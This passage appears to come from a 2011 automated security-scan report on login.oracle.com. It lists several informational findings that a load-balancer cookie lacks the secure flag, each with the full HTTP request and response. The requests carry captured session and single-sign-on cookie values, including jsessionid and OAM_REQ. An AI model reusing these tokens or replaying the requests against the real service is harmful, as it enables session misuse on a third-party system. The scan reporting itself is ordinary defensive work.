EUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPjRodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:14:16 GMT
Accept-Ranges: bytes
Content-Length: 2059
Content-Type: image/gif
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000J8zXBom6uHK6EVADUS1EHWFB01t_cB
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:16 GMT; path=/

GIF89a.......................//................0/.22.33.......,,....oo.......32.......^^............................55....00..........nn...................**.......bb.......66.65.""................_^.
...[SNIP]...

7.27. https://login.oracle.com/mysso/sso_loginui/red-b-l.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.oracle.com
Path:	/mysso/sso_loginui/red-b-l.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:16 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/red-b-l.gif HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://login.oracle.com/mysso/signon.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPjRodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:14:16 GMT
Accept-Ranges: bytes
Content-Length: 304
Content-Type: image/gif
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000J8zXBnj6uHK6EVADUS1EHWFB01t_c6
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:16 GMT; path=/

GIF89a.................................................................ST................XY............................TV............................PQ.................................................
...[SNIP]...

7.28. https://login.oracle.com/mysso/sso_loginui/red-b-m-bg.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.oracle.com
Path:	/mysso/sso_loginui/red-b-m-bg.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:16 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/red-b-m-bg.gif HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://login.oracle.com/mysso/signon.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPjRodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:14:16 GMT
Accept-Ranges: bytes
Content-Length: 154
Content-Type: image/gif
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000J8zXBpw6uHK6EVADUS1EHWFB01t_cE
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:16 GMT; path=/

GIF89a.......................................................................................................!.......,...........`cY.C<.uE.rP..$.".KU1E..;

7.29. https://login.oracle.com/mysso/sso_loginui/red-b-r.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.oracle.com
Path:	/mysso/sso_loginui/red-b-r.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:17 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/red-b-r.gif HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://login.oracle.com/mysso/signon.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPjRodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:14:17 GMT
Accept-Ranges: bytes
Content-Length: 319
Content-Type: image/gif
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000J8zXC986uHK6EVADUS1EHWFB01t_cg
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:17 GMT; path=/

GIF89a............................................MO.......MN.......PQ.......ST.........................................................................................................................
...[SNIP]...

7.30. https://login.oracle.com/mysso/sso_loginui/sso_check.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.oracle.com
Path:	/mysso/sso_loginui/sso_check.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:14 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/sso_check.js HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://login.oracle.com/mysso/signon.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPjRodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:14:14 GMT
Accept-Ranges: bytes
Content-Length: 7352
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000J8zXBOd6uHK6EVADUS1EHWFB01t_bJ
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:14 GMT; path=/

<!--
//global js var
var isNav;

// on load, run this
function doLoad() {

MM_reloadPage(true);
isNav = (navigator.appName.indexOf("Netscape") !=-1);

//register event listeners
...[SNIP]...

7.31. https://login.oracle.com/mysso/sso_loginui/t-bg.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.oracle.com
Path:	/mysso/sso_loginui/t-bg.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:16 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/t-bg.gif HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://login.oracle.com/mysso/signon.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; 